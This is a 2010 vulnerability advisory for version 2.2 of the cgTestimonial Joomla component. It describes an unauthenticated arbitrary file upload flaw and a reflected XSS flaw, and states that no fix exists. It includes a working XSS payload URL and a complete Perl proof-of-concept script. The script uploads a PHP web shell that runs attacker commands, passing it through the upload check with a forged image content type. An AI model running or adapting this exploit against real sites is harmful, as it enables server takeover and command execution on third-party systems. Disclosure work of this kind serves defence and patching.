Joomla cgTestimonial 2.2 Cross Site Scripting / Shell Upload

`cgTestimonial 2.2 Joomla Component Multiple Remote Vulnerabilities  
  
Name cgTestimonial  
Vendor http://www.cmsgalaxy.com  
Versions Affected 2.2  
  
Author Salvatore Fresta aka Drosophila  
Website http://www.salvatorefresta.net  
Contact salvatorefresta [at] gmail [dot] com  
Date 2010-08-06  
  
X. INDEX  
  
I. ABOUT THE APPLICATION  
II. DESCRIPTION  
III. ANALYSIS  
IV. SAMPLE CODE  
V. FIX  
  
  
I. ABOUT THE APPLICATION  
________________________  
  
cg_Testimonial component is a tool for adding  
testimonial by the user from frontend and managing and  
publishing testimonials from backend.  
This Joomla extension allows website user to submit a  
testimonials form with several fields on one of your  
site's page and enable adding testimonials by either  
users or admin.  
  
  
II. DESCRIPTION  
_______________  
  
Some parameters are not properly sanitised.The following  
vulnerabilities can be exploited from guest users.  
  
  
III. ANALYSIS  
_____________  
  
Summary:  
  
A) Multiple Arbitrary File Upload  
B) XSS  
  
  
A) Multiple Arbitrary File Upload  
_________________________________  
  
The usr_img parameter in cgtestimonial.php (frontend)  
and in testimonial.php (admin, without checks) is not  
properly sanitised. A check is executed on the content-  
type HTTP field.  
  
  
B) XSS  
______  
  
The url parameter in video.php is not properly sanitised  
before being printed on screen.  
  
  
IV. SAMPLE CODE  
_______________  
  
A) Multiple Arbitrary File Upload  
  
http://poc.salvatorefresta.net/PoC-cgTestimonial2.2.pl.txt  
  
B) XSS  
  
http://site/path/components/com_cgtestimonial/video.php?url="><script>alert('xss');</script>  
  
  
V. FIX  
______  
  
No fix.  
  
################################ PoC-cgTestimonial2.2.pl ################################  
  
#!/usr/bin/perl  
#  
# PoC - Remote PHP Shell Upload - cgTestimonial 2.2 Joomla Component  
#  
# Author: Salvatore Fresta aka Drosophila  
# Email: [email protected]  
#  
# Date: 06 August 2010  
#  
# http://target/path/components/com_cgtestimonial/user_images/filename?cmd=command  
#  
  
use IO::Socket;  
  
  
$usage = "\ncgTestimonial 2.2 Remote PHP Shell Upload - (c) Salvatore Fresta\n".  
"http://www.salvatorefresta.net\n\n".  
"Usage: perl PoC-cgTestimonial.pl <hostname> <path>\n\n";  
  
$#ARGV == 1 || die $usage;  
  
my $host = $ARGV[0];  
my $path = $ARGV[1];  
  
my $stop = 0;  
my $rand = "master".int(rand 150);  
my $shell = "<?php echo \"<pre>\"; system(\$_GET['cmd']); echo \"</pre>\"; ?>";  
my $filename = "evil.php";  
  
my $code = "--AaB03x\r\n".  
"Content-Disposition: form-data; name=\"usr_img\"; filename=\"$filename\"\r\n".  
"Content-Type: image/jpeg\r\n".  
"\r\n".  
"$shell\r\n".  
"--AaB03x--";  
  
my $pkg = "POST ".$path."index.php?option=com_cgtestimonial&task=submit HTTP/1.1\r\n".  
"Host: $host\r\n".  
"Content-Type: multipart/form-data; boundary=AaB03x\r\n".  
"Content-Length: " .length($code). "\r\n".  
"\r\n".  
$code;  
  
my $socket = new IO::Socket::INET( Proto=> "tcp",  
PeerAddr=> $host,  
PeerPort=> "80"  
) or die "\n[-] Unable to connect to $host\n\n";  
  
print "\n[+] Connected\n";  
print $socket $pkg;  
  
$pkg = "GET ".$path."components/com_cgtestimonial/user_images/".$filename." HTTP/1.1\r\n".  
"Host: $host\r\n\r\n";  
  
print $socket $pkg;  
  
while ((my $rec = <$socket>) && $stop != 1) {  
if($rec !=~ /302 Found/) {  
$stop = 1;  
}  
}  
  
if($stop != 1) {  
print "[-] Shell not uploaded\n";  
close($socket);  
exit;  
}  
  
print "[+] Shell uploaded on ".$host.$path."components/com_cgtestimonial/user_images/".$filename."\n".  
"[+] Disconnected\n\n";  
  
close($socket);  
  
`